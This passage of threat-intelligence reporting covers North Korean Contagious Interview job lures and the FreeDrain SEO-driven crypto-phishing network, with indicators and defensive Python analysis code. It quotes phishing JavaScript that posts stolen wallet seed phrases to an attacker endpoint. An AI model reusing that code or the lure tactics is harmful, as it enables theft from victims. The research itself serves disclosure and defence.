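            sessions.append([e])
    return sessions


if __name__ == "__main__":
    entries = parse_listing(SAMPLE_LISTING)
    for i, session in enumerate(deployment_sessions(entries), 1):
        start, end = session[0]["mtime"], session[-1]["mtime"]
        print(f"session {i}: {start:%Y-%m-%d %H:%M} to {end:%H:%M}")
        for e in session:
            flag = " (sensitive)" if e["sensitive"] else ""
            print(f"  {e['mtime']:%Y-%m-%d %H:%M}  {e['name']}{flag}")
```

Autoindex timestamps are minute-granular and in the server's local time zone, so treat the sessions as a coarse timeline and pin exact times from the log files themselves once retrieved.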

Further, several newly deployed ClickFix malware distribution servers, such as api.camdriverhelp[.]club and api.drive-release[.]cloud, were exposing ContagiousDrop applications along with the log files they had generated. These files contain information on affected individuals, allowing us to gain valuable insights into the victimology of the campaigns.

ContagiousDrop Applications

The ContagiousDrop applications, typically implemented in app.js files, are deployed on ClickFix malware distribution servers such as api.drive-release[.]cloud. These applications run servers that listen on configured ports to handle incoming HTTP GET and POST requests, executing different functions based on the specific request path.

The ContagiousDrop applications deliver malware disguised as software updates or essential utilities. They distribute a tailored payload based on the victim’s operating system (Windows, macOS, or Linux), system architecture, and method of interaction with the server, such as the use of the curl command.

Operating system-specific malware delivery

In addition to delivering malware, the ContagiousDrop applications feature an integrated email notification system. These notifications, sent from a configured email address such as designedcuratedamy58[@]gmail.com, provide the Contagious Interview threat actors with insights into victim engagement and interaction patterns and are delivered to their configured recipient addresses. For example, an email is triggered when an affected individual starts a fake skill assessment or executes a curl command to download a file from the ClickFix malware distribution server.

Email notification recipients

Furthermore, these applications record victim information across multiple files and interaction points, effectively building a victimology database and logging victim activities. For example, initial and later engagements are captured in client_ips_start_test.json and client_ips_submit.json, including details such as full name, email address, IP address, phone number, and the date of interaction. Malware download initiations are logged in files such as client_ips_start.json and client_ips_mac_start.json, which capture operating system–specific payload delivery.

Logging to client_ips_start_test.json

ContagiousDrop | Victimology

Based on ContagiousDrop log files we retrieved, we identified over 230 individuals who engaged with Contagious Interview lures between mid-January and the end of March 2025. This figure is based on log files from only a few Contagious Interview servers; therefore, the actual number of affected individuals is likely significantly higher. Their engagement spanned multiple stages of the attack, including completing fake assessment tests and progressing to the infection phase via the ClickFix technique.

Most of the affected individuals work in roles related to cryptocurrency and blockchain technologies, primarily within the marketing and finance sectors, and are geographically distributed worldwide. They engaged with lures involving various job positions, such as Portfolio Manager, Investment Manager, and Senior Product Manager, across a range of impersonated companies including Archblock, Robinhood, and eToro.

Contagious Interview victimology

In addition to entries related to victim activity, the ContagiousDrop logs also contain records likely generated during testing of lure deployment and campaign infrastructure by the Contagious Interview threat actors themselves. They used email addresses and persona names we have associated with them, such as awesomium430[@]gmail.com (found in ContagiousDrop code) and Richard Davis. Other names, such as test, test user, and Lazaro, indicate internal testing activity, with Lazaro likely being derived from the name of the North Korean umbrella threat cluster associated with Contagious Interview activities: Lazarus.

Log entries

Conclusions

North Korean threat groups actively examine CTI information to identify threats to their operations and improve the resilience and effectiveness of their campaigns, depending on their operational priorities. In addition to the actors behind the Contagious Interview campaign cluster, SentinelLABS has also observed other North Korean groups demonstrating interest in threat intelligence prior to the activities discussed in this post. In 2024, we retrieved malware associated with ScarCruft, likely designed to target consumers of threat intelligence reporting, such as threat researchers and other cybersecurity professionals. We suspect the actors aimed to gain insights into non-public CTI and defensive strategies.

In this post, we disclose indicators and TTPs that enable the sustained tracking of the Contagious Interview threat actors. While we expect them to alter their methods as a result, the expanding scale and broad targeting of these operations suggests greater benefit in empowering the wider public to effectively defend than there is in hoarding actionable intelligence indefinitely. SentinelLABS maintains other methods of tracking these evolving campaigns.

Based on our observations, the Contagious Interview threat actors do not implement systematic changes to their infrastructure based on the CTI information they consume from multiple sources, which could make their operations harder to detect or disrupt. Despite this, they continue to achieve a relatively high success rate in attracting job seekers through fraudulent employment offers and skill assessment tests. Their operational strategy appears to prioritize promptly replacing infrastructure lost due to takedown efforts by service providers, using newly provisioned infrastructure to sustain their activity.

Therefore, a critical element in mitigating this threat is the human factor. It is important that job seekers, particularly those within the cryptocurrency sector, exercise heightened vigilance when engaging with employment offers and associated assessments.

In addition, infrastructure service providers play an important role in disrupting Contagious Interview operations. Continuous and effective actions against the threat actors’ infrastructure can significantly reduce their capacity to carry out attacks. Close collaboration and coordination between service providers and the threat intelligence community are crucial to mitigating the impact of these activities. SentinelLABS and Validin remain committed to sharing timely and actionable threat intelligence to support these collaborative efforts.

Indicators of Compromise

Email Addresses (Contagious Interview Operators)

IP Addresses


Contagious Interview Domains

ClickFix Malware Distribution Servers

api.camdriverhelp[.]club
api.drive-release[.]cloud
api.release-drivers[.]online
glitchmedic[.]com

Domains Scouted by Contagious Interview Operators

easyjobinterview[.]org
hireassessment[.]com
hiringassessment[.]com
hiringassessment[.]net
screenquestion[.]org


SHA-1 Hashes

Value Note
24042a8eea9b9c20af1f7bae00296b44968a068f ContagiousDrop application (app.js)
44ddabf5b5d601077936a130a2863a96d2af1c8e ContagiousDrop application (app.js)
4a8bfa28d46ae14e45a50e105e2d34f850ffa96c ContagiousDrop application (app.js)

FreeDrain Unmasked | Uncovering an Industrial-Scale Crypto Theft Network

Executive Summary

  • FreeDrain is an industrial-scale, global cryptocurrency phishing operation that has been stealing digital assets for years.
  • FreeDrain uses SEO manipulation, free-tier web services (like gitbook.io, webflow.io, and github.io), and layered redirection techniques to target cryptocurrency wallets.
  • Victims search for wallet-related queries, click on high-ranking malicious results, land on lure pages, and are redirected to phishing pages that steal their seed phrases.
  • SentinelLABS and Validin researchers identified over 38,000 distinct FreeDrain subdomains hosting lure pages.
  • Phishing pages are hosted on cloud infrastructure like Amazon S3 and Azure Web Apps, mimicking legitimate cryptocurrency wallet interfaces.
  • Evidence suggests the operators are based in the UTC+05:30 timezone (Indian Standard Time) and work standard weekday hours.
  • FreeDrain represents a modern, scalable phishing operation that exploits weaknesses in free publishing platforms and requires better platform-level defenses, user education, and security community collaboration.

Unveiled today at PIVOTcon, this joint research from Validin, the global internet intelligence platform, and SentinelLABS, the threat intelligence and research team of SentinelOne, exposes the FreeDrain Network: a sprawling, industrial-scale cryptocurrency phishing operation that has quietly siphoned digital assets for years. What began as an investigation into a single phishing page quickly uncovered a vast, coordinated campaign weaponizing search engine optimization, free-tier web services, and layered redirection techniques to systematically target and drain cryptocurrency wallets at scale.

In this collaborative blog, we detail the technical anatomy of the FreeDrain operation from the discovery process and infrastructure mapping to evasion techniques and the end-to-end workflow attackers use to funnel victims through multilayered financial theft paths. We also walk through the custom tooling we built to hunt, track, and monitor this large campaign in real time.

Our findings highlight the growing sophistication of financially motivated threat actors and the systemic risks posed by under-moderated publishing platforms. This research underscores the need for adaptive detection, proactive monitoring, and tighter safeguards across the ecosystem to disrupt threats like FreeDrain before they scale.

The Plea for Help

Our investigation into what would become the FreeDrain Network began on May 12, 2024, when Validin received a message from a distressed individual who had lost approximately 8 BTC, worth around $500,000 at the time. The victim had unknowingly submitted their wallet seed phrase to a phishing site while attempting to check their wallet balance, after clicking on a highly-ranked search engine result.

Request for help after successful phish

The individual had come across a Validin blog post from April 2024, which documented a series of crypto-draining phishing pages. The phishing site they encountered shared striking similarities to the infrastructure we had analyzed—specifically, pages hosted on azurewebsites[.]net, along with additional dedicated domain names.

Trusted cryptocurrency tracking analysts confirmed that the destination wallet used to receive the victim’s funds was a one-time-use address. The stolen assets were quickly moved through a cryptocurrency mixer, an obfuscation method that fragments and launders funds across multiple transactions, making attribution and recovery nearly impossible.

While we weren’t able to assist in recovering the lost assets, this outreach marked a turning point. It became clear that the incident was not isolated. We set out to uncover the infrastructure behind the scam and understand the broader operation enabling these thefts to occur at scale.

Cracking the Surface – Our First Look at FreeDrain

When Validin published the initial findings in April 2024, one key piece of the puzzle remained unclear: how were these phishing pages reaching victims at scale? While common delivery methods like phishing emails, SMS (smishing), social media posts, and blog comment spam are frequently used in cryptocurrency scams, none appeared to be the source in this case.

That changed with the report from the victim in May. They had encountered the phishing site via a top-ranked search engine result, not a suspicious message or unsolicited link.

Curious whether we could reproduce the victim’s experience, we conducted a series of keyword searches ourselves. The results were startling.

Search terms like “Trezor wallet balance” returned multiple malicious results across Google, Bing, and DuckDuckGo, often within the first few result pages.

Trezor Wallet Balance malicious result in DuckDuckGo

Trezor Wallet Balance malicious result in top Bing Search

Trezor Wallet Balance malicious result in Top Google Search result

These were not obscure or poorly maintained phishing sites; they were professionally crafted lure pages freely hosted on subdomains of trusted platforms like gitbook.io, webflow.io, and github.io.

This discovery marked our first real glimpse into the scale and sophistication of the FreeDrain campaign—and raised a host of new questions. Specifically, what is the overall workflow once a victim visits the site, how are these pages becoming so highly ranked, and what can we discover about the attackers themselves?

Workflow – A Victim’s Path to Compromise

To understand how victims were being funneled into this operation and the post-visit workflow, we checked out the top-ranked search results that we knew weren’t connected to authoritative, legitimate websites, looking for malicious behavior. Within minutes, we encountered related live phishing pages, and quickly began piecing together the end-to-end workflow that a typical victim might experience.

The attack chain was deceptively simple:

  1. Search for wallet-related queries (e.g., “Trezor wallet balance”) on a major search engine.
  2. Click a high-ranking result, often hosted on a seemingly trustworthy platform like gitbook.io or webflow.io.
  3. Land on a page displaying a large, clickable image, a static screenshot of the legitimate wallet interface.
  4. Click the image, which either:
    • Redirects the user to legitimate websites.
    • Redirects the user through one or more intermediary sites
    • Directly leads to a phishing page.
  5. Arrive at the final phishing site, a near-perfect clone of the real wallet service, prompting the user to input their seed phrase.
Attack chain summary

The entire flow is frictionless by design, blending SEO manipulation, familiar visual elements, and platform trust to lull victims into a false sense of legitimacy. And once a seed phrase is submitted, the attacker’s automated infrastructure will drain funds within minutes.

Lure page linking to phishing page

Redirect to legitimate site

Lure Page Ranking – Weaponizing SEO

We were stunned by the sheer volume of lure pages appearing among top-ranked search results across all major search engines. These weren’t complex, multi-layered scams. In most cases, a page consisted of just a single large image (again, usually a screenshot of a legitimate crypto wallet interface) followed by a few lines of text offering seemingly helpful instructions; ironically, some even claimed to educate users on how to avoid phishing.

This type of simplistic, Q&A-style content is well-known in SEO circles for being rewarded by search engine algorithms. Because users often turn to search engines for direct answers, pages that appear to offer guidance, even when malicious, can be algorithmically elevated in rankings, especially when hosted on high-reputation platforms.

In our early investigation (May–June 2024), we found that many of these lure pages were hosted on services like webflow.io and gitbook.io. Both platforms provide low-friction publishing, enabling anyone to spin up a custom subdomain and publish arbitrary content for free. The subdomains used followed familiar spammer patterns: frequent use of hyphens, deliberate misspellings, and keyword stuffing to manufacture variation and dodge blacklisting.

Subdomain naming scheme similarities

Generative AI as a Tool for Scale

The text on many lure pages bore clear signs of having been generated by large language models. We found copy-paste artifacts that revealed the specific tools used, most notably, strings like “4o mini”, a likely reference to OpenAI’s GPT-4o mini model. These telltale traces suggest that FreeDrain operators are leveraging generative AI not only to create scalable content but doing so carelessly at times.

Fake content mistakenly including OpenAI GPT-4o mini reference

FreeDrain’s Secret Weapon – Spamdexing

But content alone doesn’t explain how these pages were getting indexed and ranked above legitimate sources. How were search engines even discovering them?

The answer came when we identified several indexed URLs pointing back to high-ranking lure pages and traced them to massive comment spam campaigns. FreeDrain operators appear to be heavily abusing neglected web properties that allow open or weakly moderated comments, flooding them with links to their lure pages. This old tactic, known as spamdexing, is a well-documented SEO abuse technique and one of several ways FreeDrain attempts to game search rankings.

In one striking example, we found a Korean university photo album page with a single image uploaded over a decade ago, buried under 26,000 comments, nearly all of them containing spam links.

FreeDrain uses large-scale comment spam on poorly-maintained websites to boost the visibility of their lure pages via search engine indexing

This technique allows FreeDrain to sidestep traditional delivery vectors like phishing emails or malicious ads, instead meeting victims exactly where they’re looking, at the top of trusted search engines.

Tracking Search Results

Understanding how FreeDrain’s lure pages consistently climbed to the top of search results became a key investigative goal, and it demanded custom tooling.

We built a purpose-specific crawler designed solely to emulate search engine queries, navigate through pages of search results, and extract structured data from each result: URLs, page titles, and text content summaries. The goal was to systematically monitor how malicious pages were ranking, shifting, and proliferating over time.

We ran this system daily across 700 unique keyword permutations, capturing up to 40 pages deep per search query, per search engine. This daily monitoring provided a dynamic, longitudinal view into the visibility of FreeDrain’s infrastructure.

The Scale of Abuse

After four months of collection, we amassed a dataset of more than 200,000 unique URLs, drawn from topical search results across at least a dozen different publishing platforms that allow users to create custom subdomains. Aggressively filtering, we identified over 38,000 distinct FreeDrain subdomains hosting the lure pages.

These subdomains appeared on well-known free hosting and publishing platforms, including:

  • Gitbook (gitbook.io)
  • Webflow (webflow.io)
  • Teachable (teachable.com)
  • Github.io
  • Strikingly (mystrikingly.com)
  • WordPress.com
  • Weebly.com
  • GoDaddySites (godaddysites.com)
  • Educator Pages (educatorpages.com)
  • Webador (webador.com)
Breakdown of total domains to suspected URLs, to Confirmed URLs by quantity

The volume and spread across legitimate platforms further highlights how FreeDrain relies on the low-friction, high-trust nature of these services to evade detection and amplify reach.

To go beyond static discovery, we implemented scheduled re-crawls of every suspected lure page. This allowed us to track:

  • Content updates over time
  • Changes in redirect behavior
  • New final-stage phishing URLs being introduced
  • Takedowns and domain churn

This gave us a clearer picture of FreeDrain’s infrastructure lifecycle, from initial lure page creation to eventual takedown or abandonment, which helped us understand the rotation strategies used to keep malicious links live and searchable.

Lure Page Breakdown

Despite being spread across a wide array of publishing platforms, FreeDrain lure pages followed a remarkably consistent structure, carefully optimized to appear helpful and legitimate, while subtly guiding victims toward compromise.

Common Elements Observed Across Lure Pages

Across gitbook.io, webflow.io, github.io, and others, the pages typically included:

  • A single, large, clickable image occupying most of the viewport
    • This image was a screenshot of a legitimate cryptocurrency site (e.g., Trezor, Metamask, or Ledger)
    • The image linked externally, usually to a malicious redirection chain
  • AI-generated help content positioned below the image
    • The text answered common user queries like “How do I check my wallet balance on Trezor?”
  • 1–2 additional embedded links, which pointed to the same external destination as the image or were placeholders like "#"

Link Behavior: Redirection Variability

Clicking the image or associated links triggered unpredictable outcomes, depending on the time, user agent, or page freshness:

  • Redirection through one or more intermediary domains (typically 1–5 hops)
  • Final destinations varied widely:
    • A phishing page built to capture wallet seed phrases (hosted on Azure or AWS S3)
    • A legitimate site like trezor.io or metamask.io, creating false reassurance
    • A non-functional domain (404 or NXDOMAIN)
    • The current page itself ("#") acting as a placeholder when infrastructure wasn’t active

This redirection behavior made classification challenging, especially since not every page led directly to a phishing endpoint in every instance. We also observed that lure pages initially hosted benign content and were modified to include malicious redirects only later, usually weeks or months afterwards. This aging tactic likely helped the sites build trust and survive longer before being flagged or removed.

A Github lure page that has just been changed from benign to malicious

Obfuscation Through Variation

Identifying FreeDrain lure pages at scale proved difficult due to extreme variation in phrasing, metadata, and platform-specific formatting. For example, we identified 46 unique renderings of the word “Trezor”, all visually similar, using tricks like added Unicode characters, zero-width spaces, and mixed script alphabets.
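As an added illustration (not tooling from the original research), the Python normalizer below folds the kinds of variation described above, zero-width characters, fullwidth and accented letters, mixed-script look-alikes and digit substitutions, onto a single key so that the distinct raw renderings of a brand name can be counted across pages. The confusables subset and the sample page texts are constructed for the example.

```python
from __future__ import annotations

import re
import unicodedata
from collections import Counter

# Invisible code points commonly inserted to defeat exact-match filters:
# zero-width space / non-joiner / joiner, word joiner, BOM, soft hyphen.
ZERO_WIDTH = set("\u200b\u200c\u200d\u2060\ufeff\u00ad")

# Constructed subset of Unicode confusables: look-alike letters from other
# scripts mapped to the ASCII letter they imitate. Extend from the Unicode
# confusables.txt table for real use.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0455": "s", "\u0456": "i", "\u0458": "j",
    "\u0410": "a", "\u0415": "e", "\u041e": "o", "\u0420": "p", "\u0421": "c",
    "\u0422": "t", "\u0425": "x", "\u0405": "s", "\u0406": "i", "\u0408": "j",
    "\u03bf": "o", "\u039f": "o", "\u0391": "a", "\u0395": "e", "\u0396": "z",
    "\u0399": "i", "\u039a": "k", "\u039c": "m", "\u039d": "n", "\u03a1": "p",
    "\u03a4": "t", "\u03a5": "y", "\u03a7": "x",
}

# Digit / symbol substitutions for letters (Trez0r, Tre$or, ...).
LEET = {"0": "o", "1": "l", "3": "e", "4": "a", "5": "s", "7": "t", "@": "a", "$": "s"}

# ASCII punctuation that may surround a token in running text.
EDGE_PUNCT = ".,;:!?()[]{}\"'"


def normalize_token(token: str) -> str:
    """Collapse visual and encoding tricks so look-alike renderings compare equal."""
    # 1. drop invisible separators such as zero-width spaces
    t = "".join(ch for ch in token if ch not in ZERO_WIDTH)
    # 2. compatibility normalisation folds fullwidth letters, ligatures, etc.
    t = unicodedata.normalize("NFKC", t)
    # 3. map mixed-script look-alikes onto ASCII
    t = "".join(CONFUSABLES.get(ch, ch) for ch in t)
    # 4. strip combining accents (Tre\u0301zor -> Trezor) and fold case
    t = "".join(ch for ch in unicodedata.normalize("NFD", t)
                if unicodedata.category(ch) != "Mn").casefold()
    # 5. undo digit/symbol-for-letter substitutions (Trez0r -> trezor)
    t = "".join(LEET.get(ch, ch) for ch in t)
    # 6. drop any punctuation left inside the token (T.r.e.z.o.r -> trezor)
    return re.sub(r"[^a-z0-9]", "", t)


def find_brand_variants(text: str, brand: str) -> list[str]:
    """Return every raw token in `text` whose normalised form equals `brand`."""
    target = normalize_token(brand)
    hits = []
    for tok in text.split():
        raw = tok.strip(EDGE_PUNCT)
        if raw and normalize_token(raw) == target:
            hits.append(raw)
    return hits


def variant_counts(pages: dict[str, str], brand: str) -> Counter:
    """Count distinct raw renderings of `brand` across pages (heatmap input)."""
    counts: Counter = Counter()
    for body in pages.values():
        counts.update(find_brand_variants(body, brand))
    return counts


# Constructed lure-page text samples, one per hypothetical subdomain.
SAMPLE_PAGES = {
    "lure-1.gitbook.io": "How do I check my Trezor wallet balance? Open Trezor Suite.",
    "lure-2.webflow.io": "Tre\u200bzor wallet balance check guide",          # zero-width space
    "lure-3.github.io": "Tr\u0435z\u043er Suite login and balance",           # Cyrillic e, o
    "lure-4.gitbook.io": "\uff34\uff32\uff25\uff3a\uff2f\uff32 wallet balance",  # fullwidth TREZOR
    "lure-5.webflow.io": "Trez0r hardware wallet balance",                    # digit substitution
    "lure-6.github.io": "Tr\u00e9zor balance, Ledger balance",                # accented e
}

if __name__ == "__main__":
    for rendering, n in variant_counts(SAMPLE_PAGES, "Trezor").most_common():
        print(f"{n:3d}  {rendering!r:30}  -> {normalize_token(rendering)}")
```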

Trezor variation heatmap by quantity

Demonstrating the variation in tooling, we found that FreeDrain pages on github.io were usually copies of content generated with services such as Mobrise Website Builder and Webflow.

Snippets of pages hosted on github.io with content clearly generated using other tools, for example, “Mobrise Website Builder”

A turning point in connecting these fragmented domains came from pivoting off the redirection infrastructure. While the lure content varied, the redirectors often remained consistent across pages and platforms.

Validin result showing redirector abusing free services

By tracing traffic from anchor links to known FreeDrain redirectors, we were able to map common ownership and activity across otherwise-unrelated services. This infrastructure-based pivot became essential for clustering and attribution, bridging gaps that the lure content itself couldn’t.

Redirectors

Pivoting on URLs from known and suspected FreeDrain lure pages that we were monitoring, we quickly noticed some noteworthy patterns in the FreeDrain redirection domains.

Domain Characteristics

Nearly all redirector domains shared several features:

  • .com TLDs exclusively
  • Names that appeared algorithmically generated, likely via a Domain Generation Algorithm (DGA) or Markov chain model
  • English-adjacent structure, visually familiar but never forming real English words

Examples include:

  • antressmirestos[.]com
  • shotheatsgnovel[.]com
  • bildherrywation[.]com

Each URL also included a GUID-like string in the path, which may have served as a session ID, traffic source identifier, or logic gate for redirection behavior. Examples:

  • https://causesconighty[.]com/ce405b14-337a-43a5-9007-ed1aaf807998
  • https://causesconighty[.]com/d7c95729-6eed-452a-b246-865e0d97fc23
  • https://disantumcomptions[.]com/61e7fc9c-baef-43f0-82bf-a7f12a025586
  • https://disantumcomptions[.]com/6c31ec3b-0d4b-4bf4-a9f4-91453c4ef99e
  • https://distrypromited[.]com/d7c95729-6eed-452a-b246-865e0d97fc23
  • https://distrypromited[.]com/ff933705-9619-4292-9e22-02269acc197b
  • https://posectsinsive[.]com/9431711a-cf35-4ebd-b5db-eacba9ef7ee3
  • https://posectsinsive[.]com/994ffe2a-21fb-448a-b4e3-01b9483c5460

(A complete list of FreeDrain-associated redirector domains is provided in the appendix.)
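An added example, not Validin's or SentinelLABS's own tooling, of the redirector pivot described above: it extracts anchor links from lure-page HTML, labels them the way the lure-page breakdown does (placeholder "#", internal, external, GUID-path redirector), and groups lure hosts by redirector domain and by reused GUID. The HTML and lure hostnames are constructed; the redirector URLs are the page's published examples, defanged, and are refanged before parsing.

```python
import re
from collections import defaultdict
from html.parser import HTMLParser
from urllib.parse import urlparse

# Redirector paths on the page have the 8-4-4-4-12 hex shape; match that.
GUID_PATH = re.compile(
    r"^/([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})/?$", re.I)


class AnchorCollector(HTMLParser):
    """Collect href values of <a> tags in document order."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value is not None:
                    self.hrefs.append(value.strip())


def extract_hrefs(html):
    parser = AnchorCollector()
    parser.feed(html)
    return parser.hrefs


def refang(url):
    """Undo the usual IoC defanging so the URL can be parsed."""
    return url.replace("[.]", ".").replace("hxxp", "http")


def classify_href(href, lure_host):
    """Return (kind, detail) for one outbound link on a lure page."""
    if href == "" or href.startswith("#"):
        return "placeholder", None            # "#" stand-in while infra is idle
    parsed = urlparse(refang(href))
    host = parsed.netloc.lower()
    if not host or host == lure_host.lower():
        return "internal", None
    match = GUID_PATH.match(parsed.path)
    if match:
        return "redirector", (host, match.group(1).lower())
    return "external", (host, None)           # e.g. the real trezor.io


def pivot_by_redirector(pages):
    """pages: {lure_host: html}. Cluster lures by redirector domain and GUID."""
    by_domain = defaultdict(set)
    by_guid = defaultdict(set)
    kinds = {}
    for lure_host, html in pages.items():
        counts = defaultdict(int)
        for href in extract_hrefs(html):
            kind, detail = classify_href(href, lure_host)
            counts[kind] += 1
            if kind == "redirector":
                domain, guid = detail
                by_domain[domain].add(lure_host)
                by_guid[guid].add(domain)
        kinds[lure_host] = dict(counts)
    return {
        "by_redirector": {d: sorted(h) for d, h in by_domain.items()},
        "by_guid": {g: sorted(d) for g, d in by_guid.items()},
        "link_kinds": kinds,
    }


# Constructed lure pages (hostnames invented); redirector URLs are the
# page's published, defanged examples.
SAMPLE_PAGES = {
    "trezor-wallet-balance.gitbook.io": (
        '<a href="https://causesconighty[.]com/ce405b14-337a-43a5-9007-ed1aaf807998">'
        '<img src="trezor-suite.png"></a><p>How do I check my Trezor balance?</p>'
        '<a href="#">Read more</a>'),
    "check-trezor-balance.webflow.io": (
        '<a href="https://distrypromited[.]com/d7c95729-6eed-452a-b246-865e0d97fc23">'
        '<img src="hero.png"></a><a href="https://trezor.io/">Official site</a>'),
    "trezor-suite-login.github.io": (
        '<a href="https://causesconighty[.]com/d7c95729-6eed-452a-b246-865e0d97fc23">'
        '<img src="hero.png"></a><a href="/about.html">About</a><a href="#">Help</a>'),
}

if __name__ == "__main__":
    import json
    print(json.dumps(pivot_by_redirector(SAMPLE_PAGES), indent=2))
```

A GUID shared by two redirector domains, as in the constructed sample and in the page's own URL list, is a stronger ownership signal than the domain names alone.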

Domain Registration and Infrastructure Clues

All domains we identified were registered via Key-Systems GmbH, a registrar often used for bulk domain purchases and programmatic registration.

Initially, we suspected that these domains were all managed by the FreeDrain operators as well, but we have since connected them to a much larger network of thousands of domain names used to route traffic for many different purposes.

Looking at DNS history for some of the older redirectors on our list, we saw that they rotated IP addresses relatively infrequently, resolving to just a small number of IPs within a time window of weeks to months.

DNS history for scientcontopped[.]com prior to expiration (2024)

The domain resolved to only a handful of IPs over its active life, suggesting stable, centralized hosting infrastructure.

Pivoting on IP addresses shared by these older FreeDrain domains revealed that there are hundreds of other domain names that share nearly identical characteristics in terms of naming conventions, registration patterns, and hosting patterns. Yet, these other domains didn’t exhibit direct ties to FreeDrain behavior.

Pivot from confirmed FreeDrain redirector (yellow asterisk) reveals broader domain ecosystem with matching infrastructure traits

This led us to two possibilities:

  1. The redirectors are part of a leased infrastructure-as-a-service model, used by FreeDrain and potentially many other threat actors
  2. FreeDrain is a subdivision of a broader operation, with shared tooling and infrastructure but distinct campaigns

At this stage, the full extent of this infrastructure and the relationships between campaigns remain an open research question. What is clear, however, is that FreeDrain does not operate in isolation, and the redirection layer may be a service used by multiple actors.

Phishing Pages

Across our monitoring, we observed dozens of variations in FreeDrain phishing pages, but technically they were all fairly simple and consistent in architecture.

These phishing pages were most often:

  • Hosted on cloud infrastructure, primarily Amazon S3 and Azure Web Apps
  • Designed to mimic legitimate cryptocurrency wallet interfaces (Trezor, MetaMask, Ledger, etc.)
  • Implemented using HTML forms or AJAX POST requests to transmit stolen credentials to attacker-controlled endpoints
A typical FreeDrain phishing page served from an S3 bucket, delivering only static content

Some S3-hosted phishing sites sent harvested data to live backend services on Azure, as seen in multiple instances where form actions pointed to azurewebsites.net applications.

The form for an S3-hosted FreeDrain phishing page posts to “/send.php” running in Azure

Human Operators Behind the Scenes

While most pages used standard static phishing techniques, we occasionally encountered live chat widgets embedded in Azure-hosted phishing pages.

This chat feature had previously been documented in a 2022 report by Netskope (one of the few references we ever found to FreeDrain and the earliest reported). Our own interactions confirmed that humans, not bots, were responding to victim inquiries in real time, often providing reassurance or technical “help” to keep targets engaged.

Live chat interaction on a phishing page hosted in Azure

Clean, Unobfuscated Exfiltration Code

In the malicious JavaScript we observed handling POST requests containing stolen seed phrases, the code is well formatted, commented, and does not appear to be obfuscated in any way. Full examples are provided in the appendix, but a snippet of the POST request is below (domain defanged):

const data = {};
inputs.forEach((input, index) => {
    data[`phrase${index}`] = input.value.trim(); // one field per seed-phrase word
});
data.subject = "Trezor connect2";
data.message = "Successfull fetch data";
$.ajax({
    type: "POST",
    url: "https://rfhwuwixxi.execute-api.us-east-1.amazonaws[.]com/prod/eappmail",
    dataType: "json",
    crossDomain: true,
    contentType: "application/json; charset=utf-8",
    data: JSON.stringify(data),
    success: function (result) {
        alert('Data submitted successfully1!');
        window.location.href = 'https://suite.trezor.io/web/';
        location.reload();
    },
    error: function (xhr, status, error) {
        // even when the POST fails, the victim is bounced to the real Trezor site
        window.location.href = 'https://suite.trezor.io/web/';
    }
});

Despite its simplicity, the phishing backend was effective, disposable, and often difficult to trace—highlighting just how low the bar is for technical sophistication when paired with wide-scale reach and persistent lure infrastructure.

Actor Analysis

Attribution is inherently difficult when infrastructure is ephemeral and built on shared, free-tier services. Yet through a combination of repository metadata, behavioral signals, and timing artifacts, we were able to extract meaningful insights about FreeDrain’s operators, including likely location, working patterns, and their degree of operational coordination.

Our first major breakthrough came from GitHub Pages (github.io), which only allows hosting via a public repository that matches the account’s GitHub username (e.g., username.github.io). This constraint meant every active FreeDrain lure page hosted on GitHub had a publicly accessible repository behind it.

We cloned hundreds of these repositories and analyzed the commit metadata, including timestamps, usernames, email addresses, and whether commits were made via the CLI or web interface. Several clear patterns emerged:

  • Email addresses were always unique, tied 1:1 with the GitHub account, and never reused.
  • All emails came from free providers like Gmail, Hotmail, Outlook, and ProtonMail.
  • While naming styles varied widely (capitalization, numbers, patterns), we found clusters of similarly structured addresses, suggesting manual creation by multiple individuals, possibly using a shared template or naming approach.
Sample of email addresses found in FreeDrain-associated Github commit

Importantly, GitHub commits preserve the local timezone of the user unless manually configured otherwise. In our dataset, over 99% of commits were timestamped in UTC+05:30 (Indian Standard Time), our first strong geographic indicator.

Over 99% of the commits analyzed were localized to UTC+05:30

We corroborated this signal using metadata from other free services abused by FreeDrain. Webflow, for instance, embeds a “last published” timestamp in the HTML source of hosted sites. When we aggregated these timestamps across the many FreeDrain Webflow pages, a clear 9-to-5 weekday work pattern emerged, complete with a consistent midday break. This pattern aligns closely with a standard business schedule in the IST timezone.
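An added example, not the authors' tooling, of the timezone and working-hours analysis described above: given `git log --format='%H %aI'` output from cloned repositories (author timestamps keep the committer's local UTC offset), it computes the offset distribution, then the weekday and hour-of-day profile with every commit converted into the dominant offset. The log lines and hashes are constructed; the single +00:00 commit stands in for a commit made through the GitHub web interface, which is stamped in UTC rather than the author's local time.

```python
from collections import Counter
from datetime import datetime, timedelta, timezone

# Constructed sample in the shape of `git log --format='%H %aI'`; the hashes
# are placeholders, not real FreeDrain commits.
SAMPLE_LOG = """\
0000000000000000000000000000000000000001 2024-06-17T10:12:41+05:30
0000000000000000000000000000000000000002 2024-06-17T11:45:03+05:30
0000000000000000000000000000000000000003 2024-06-18T10:05:19+05:30
0000000000000000000000000000000000000004 2024-06-18T15:30:00+05:30
0000000000000000000000000000000000000005 2024-06-19T09:58:27+05:30
0000000000000000000000000000000000000006 2024-06-19T16:20:10+05:30
0000000000000000000000000000000000000007 2024-06-20T10:40:55+05:30
0000000000000000000000000000000000000008 2024-06-20T06:31:09+00:00
0000000000000000000000000000000000000009 2024-06-21T11:02:13+05:30
0000000000000000000000000000000000000010 2024-06-21T17:15:44+05:30
0000000000000000000000000000000000000011 2024-06-22T12:10:00+05:30
"""


def parse_log(text):
    """Return [(sha, aware datetime)] from `%H %aI` formatted lines."""
    commits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        sha, stamp = line.split()
        commits.append((sha, datetime.fromisoformat(stamp)))
    return commits


def format_offset(delta):
    """Render a UTC offset timedelta as +HH:MM / -HH:MM."""
    total = int(delta.total_seconds())
    sign = "+" if total >= 0 else "-"
    total = abs(total)
    return f"{sign}{total // 3600:02d}:{(total % 3600) // 60:02d}"


def offset_shares(commits):
    """Fraction of commits carrying each UTC offset."""
    counts = Counter(format_offset(dt.utcoffset()) for _, dt in commits)
    return {offset: n / len(commits) for offset, n in counts.items()}


def dominant_offset(commits):
    """The most common UTC offset as a timedelta."""
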